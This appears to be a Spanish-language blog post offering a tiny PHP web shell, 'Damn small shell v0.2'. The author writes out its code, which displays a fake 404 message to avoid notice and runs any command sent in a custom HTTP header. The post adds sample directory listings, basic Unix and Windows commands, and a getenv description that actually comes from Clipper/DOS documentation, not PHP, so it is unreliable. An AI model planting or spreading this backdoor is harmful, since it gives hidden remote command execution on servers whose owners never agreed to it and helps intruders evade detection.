Damn small shell v 0.2

Un pequeño script anti-tontos en php, lo suben a su servidor y pueden ejecutar comandos como si fuera la consola de linux o el cmd de windows.

He hecho lo posible por que pase desapersivido el archivo, si intentan entrar desde navegador aparecerá :404 – Archivo no encontrado, pero pueden cambiarlo por un NOT FOUND o lo que quieran y así si alguien externo a ustedes lo encuentra no sabrá que onda xD

Forma de usarlo: ^^ averiguenla si son buenos con el php 😉

Les dejo el Script.

Inicio PHP
$var=getenv(‘HTTP_ACCEPT_dmd’);
echo’404 – Archivo no encontrado‘;
echo “\n\n”;
$a=$var; $var=0;
if(strstr($a,’xD’)==’xD’)
{echo `$a`;}
Fin PHP

Así debe quedar.
Funciona tanto en windows como en linux, claro! teniendo php instalado en el servidor.

WINDOWS un Dir C:

El volumen de la unidad C no tiene etiqueta.
El n£mero de serie del volumen es: E8A0-7E45
Directorio de C:\AppServ\www
12/02/2009 17:52 .
12/02/2009 17:52 ..
29/08/2008 06:50 6.205 Affiliates_v1-1.zip
27/10/2008 17:5027/10/2008 16:53 331.370 ajax_im_3.41_yui.zip
07/09/2008 18:50 appserv
06/02/2009 19:25 carma
07/09/2008 18:50 cgi-bin
29/08/2008 06:47 393.312 Classv1_20Beta.zip

LINUX un ls -al;

-rw-r–r– 1 daniel daniel 490 Nov 3 2008 index.html
-rw-r–r– 1 daniel daniel 2540 Jul 16 12:42 archivo.html
-rw-r–r– 1 daniel daniel 3668 Nov 3 2008 zuper.php
lrwxr-xr-x 1 root www 36 Nov 20 2008 stat -> /home/awstats/
-rwxr-xr-x 1 daniel daniel 221 Nov 3 2008 style.css
-rw-r–r– 1 daniel daniel 490 Nov 3 2008 car
-rwxr-xr-x 1 daniel daniel 1086 Nov 3 2008 dan.htm
-rw-r–r– 1 daniel daniel 8014 Nov 3 2008 youknow.gif

Algunos comandos para unix
ls -al <–lista todos los archivos y los permisos
find y locate <– son para búsqueda de archivos.
mv <– mover archivos y directorios.
mkdir<–crea directorios
rm <– remover archivos y directorios
wget<– descargar archivos al igual que
curl echo <–mostrar mensajes y escribir en archivos
pwd <– muestra la ruta en la que te encuentras
cd <– para subir y bajar directorios

Algunos comandos para windows.
dir <– mostrar directorios
copy <–copiar archivos y directorios
rename <–renombrar archivos y directorios
mkdir <–crear direcotorios
rmdir <–remover directorios o archivos
tree <–arbol de directorios Hay mas pero son los que me acuerdo ahorita, búsquenle en google.

Comandos para cmd
Comandos para unix

¿Que es getenv?
Obtiene el contenido de una variable de entorno DOS

Sintaxis
GETENV() –> cCadena
Argumentos
es el nombre de la variable de entorno del DOS. Cuando se especifica este argumento, puede utilizarse cualquier combinación de letras mayúsculas y minúsculas; GETENV() no es sensible a las mayúsculas y minúsculas.
Devuelve
GETENV() devuelve el contenido de la variable de entorno del DOS especificada como una cadena de caracteres. Si no se puede localizar la variable, GETENV() devuelve una cadena nula (“”).
Descripción
GETENV() es una función de entorno que le permite obtener información del entorno DOS en un programa de aplicación. Normalmente, ésta es la información de la configuración, incluyendo los nombres de vía que proporcionan la situación de los ficheros (base de datos, índice, etiqueta o informes). Esta función es particularmente útil en entornos de red.

Mas info de getenv: tinet.org

Sale bitches a ponerse a pensar un rato 😉

Deja un comentario

Este sitio usa Akismet para reducir el spam. Aprende cómo se procesan los datos de tus comentarios.